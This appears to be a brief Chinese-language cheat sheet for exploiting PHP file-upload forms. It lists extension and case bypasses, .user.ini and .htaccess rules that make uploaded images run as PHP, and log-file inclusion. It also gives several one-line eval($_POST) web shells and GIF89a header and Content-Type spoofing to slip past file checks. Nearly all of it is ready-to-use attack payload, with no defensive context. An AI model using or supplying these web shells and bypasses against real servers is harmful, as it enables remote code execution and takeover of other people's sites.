后缀:php, php3, php4, php5, phtml, .asp ,pHP(大小写绕过)
双写绕过:pphphp
配置文件:.user.ini .htaccess
.user.ini :(上传点 要有 index.php)
1、auto_prepend_file=‘/var/log/nginx/access.log’ (log被过滤 => l"."og 绕过过滤)
2、auto_prepend_file=1.png
.htaccess :
1、 AddType application/x-httpd-php .png (将png后缀的文件当做php文件执行,png => jpg,gif 等)
2 、 ( 将 1.jpg 中的内容当作php代码执行 )
<FilesMatch "1.jpg"> SetHandler application/x-httpd-php </FilesMatch>
一句话木马:( {} 可代替 [] )
<?php eval($_POST[1]);?>
<?=eval($_POST[1]);?> (过滤了php)
<?php eval(phpinfo());?>
<script language='php'>@eval($_POST[1])</script> (过滤了? )
GIF89a 绕过图像文件头检查
Content-Type: application/x-www-form-urlencoded
一般改成 Content-Type:image/png